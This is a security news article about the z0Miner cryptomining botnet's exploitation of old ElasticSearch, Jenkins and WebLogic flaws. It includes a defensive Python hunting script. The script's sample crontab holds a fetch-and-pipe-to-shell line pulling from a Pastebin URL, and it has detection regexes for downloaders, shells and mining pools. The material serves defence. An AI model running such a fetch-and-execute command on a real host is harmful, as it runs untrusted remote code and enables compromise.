
Cryptomining Botnet Targets Unpatched Vulnerabilities in Cloud Servers

Attackers routinely upgrade their tooling to scan for and infect new hosts through vulnerabilities that victims have left unpatched. Recently, the z0Miner cryptomining malware was spotted probing cloud servers with a new set of exploits for old, long-since-patched vulnerabilities that many internet-facing servers still carry.

z0Miner active campaign

Qihoo 360 Netlab researchers have observed z0Miner actively hunting ElasticSearch and Jenkins servers through vulnerabilities for which patches have been available for years, in the ElasticSearch case since 2015.

  • The botnet uses exploits for an ElasticSearch remote code execution vulnerability (CVE-2015-1427) and an older RCE in Jenkins.
  • After compromising a server, the malware first downloads a malicious shell script and sets up a new cron entry that periodically fetches and executes further scripts from Pastebin, so the operators can swap payloads without re-exploiting the host.
  • The botnet then downloads a mining kit containing an XMRig miner binary disguised as java.exe, a config file (config.json), and a starter script (solr.sh), and begins mining Monero (XMR) in the background.
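The infection chain above leaves two host-level artefacts a defender can hunt for: a cron entry that fetches and runs a script from Pastebin, and a miner process running under a look-alike name (java.exe, solr.sh) or pointed at a stratum mining pool. The following Python is an added example, not code from the article or from Netlab's report. The indicator names come from the write-up; the regex heuristics are assumptions, and the sample crontab and process list are constructed for the example (the paste id, paths and pool hostname are made up).

```python
"""Hunt for z0Miner-style persistence and miner artefacts on a Linux host.

Added example (not from the article or Netlab). Indicator names (pastebin.com,
java.exe, solr.sh, config.json) follow the write-up; the regexes are
assumptions; the sample data at the bottom is constructed.
"""
import re
import shlex
from dataclasses import dataclass

# Stage-2 scripts are pulled from Pastebin per the article.
PASTE_HOST_RE = re.compile(r"https?://(?:[\w.-]+\.)?pastebin\.com/", re.I)
DOWNLOADER_RE = re.compile(r"\b(?:curl|wget)\b", re.I)
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:/bin/)?(?:ba)?sh\b")

# Names the mining kit uses for its binary and starter script (from the article).
MINER_NAMES = {"java.exe", "solr.sh"}
STRATUM_RE = re.compile(r"stratum\+(?:tcp|ssl)://", re.I)


@dataclass
class Finding:
    source: str   # "cron" or "process"
    where: str    # the crontab line or "pid N"
    reason: str


def parse_cron_command(line):
    """Return the command part of a per-user crontab line, or None for
    blank lines, comments, VAR=value lines and malformed entries.
    (System crontabs with a user column are not handled; assumption.)"""
    stripped = line.strip()
    if not stripped or stripped.startswith("#") or re.match(r"^\w+=", stripped):
        return None
    if stripped.startswith("@"):            # @reboot, @hourly, ...
        parts = stripped.split(None, 1)
        return parts[1] if len(parts) == 2 else None
    parts = stripped.split(None, 5)         # five time fields, then the command
    return parts[5] if len(parts) == 6 else None


def scan_crontab(text):
    """Flag cron jobs that download from Pastebin (and worse, pipe it to a shell)."""
    findings = []
    for line in text.splitlines():
        cmd = parse_cron_command(line)
        if cmd is None:
            continue
        if DOWNLOADER_RE.search(cmd) and PASTE_HOST_RE.search(cmd):
            reason = "downloads from pastebin.com"
            if PIPE_TO_SHELL_RE.search(cmd):
                reason += " and pipes it to a shell"
            findings.append(Finding("cron", line.strip(), reason))
    return findings


def scan_processes(procs):
    """procs: iterable of (pid, cmdline). Flag kit file names anywhere in argv
    (catches both '/tmp/.x/java.exe ...' and '/bin/sh /tmp/.x/solr.sh') and
    any process handed a stratum pool URL."""
    findings = []
    for pid, cmdline in procs:
        try:
            argv = shlex.split(cmdline)
        except ValueError:
            argv = cmdline.split()
        basenames = {a.rsplit("/", 1)[-1] for a in argv}
        reasons = []
        hits = sorted(basenames & MINER_NAMES)
        if hits:
            reasons.append("kit file name(s) on command line: " + ", ".join(hits))
        if STRATUM_RE.search(cmdline):
            reasons.append("stratum mining pool URL on command line")
        if reasons:
            findings.append(Finding("process", f"pid {pid}", "; ".join(reasons)))
    return findings


def hunt(crontab_text, procs):
    return scan_crontab(crontab_text) + scan_processes(procs)


# Constructed sample data: one benign cron job, one z0Miner-style fetcher,
# a legitimate Jenkins JVM, and three miner-related processes.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=root
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * (curl -fsSL https://pastebin.com/raw/abcd1234 || wget -q -O- https://pastebin.com/raw/abcd1234) | sh
@reboot /opt/solr/bin/solr start
"""
SAMPLE_PROCESSES = [
    (1203, "/usr/lib/jvm/java-11-openjdk-amd64/bin/java -jar /opt/jenkins/jenkins.war"),
    (4471, "/tmp/.x/java.exe -c /tmp/.x/config.json"),
    (4480, "/bin/sh /tmp/.x/solr.sh"),
    (5112, "xmrig -o stratum+tcp://pool.example:3333 --donate-level 1"),
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_CRONTAB, SAMPLE_PROCESSES):
        print(f"[{f.source}] {f.where}\n    {f.reason}")
```

On a live host, feed it `crontab -l` output for each user (plus /var/spool/cron and /etc/cron.d, minding the user column) and `ps -eo pid,args`; treat a match as a trigger for isolating the host and pulling the downloaded scripts and config.json before the cron job rotates them.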

Earlier campaigns

Since it first surfaced in 2020, z0Miner has been observed gaining persistence via crontab and mining Monero.

  • According to the Tencent Security Team, z0Miner was actively exploiting two Oracle WebLogic flaws, CVE-2020-14882 and CVE-2020-14883, which chain into unauthenticated remote code execution, to spread to other servers.
  • In addition, the botnet moved laterally from already compromised hosts across the network via SSH.
  • Using this attack logic it had already compromised thousands of servers.

Conclusion

z0Miner’s recent campaign shows how vulnerabilities disclosed and fixed years ago remain profitable for criminals as long as exposed servers go unpatched. Organizations should keep all systems and applications current with vendor patches, and should not expose management services such as ElasticSearch and Jenkins directly to the internet, so that the next exploit added to such a botnet finds nothing to hit.

Source: https://cyware.com/news/cryptomining-botnet-targets-unpatched-vulnerabilities-in-cloud-servers-29f9f8a3
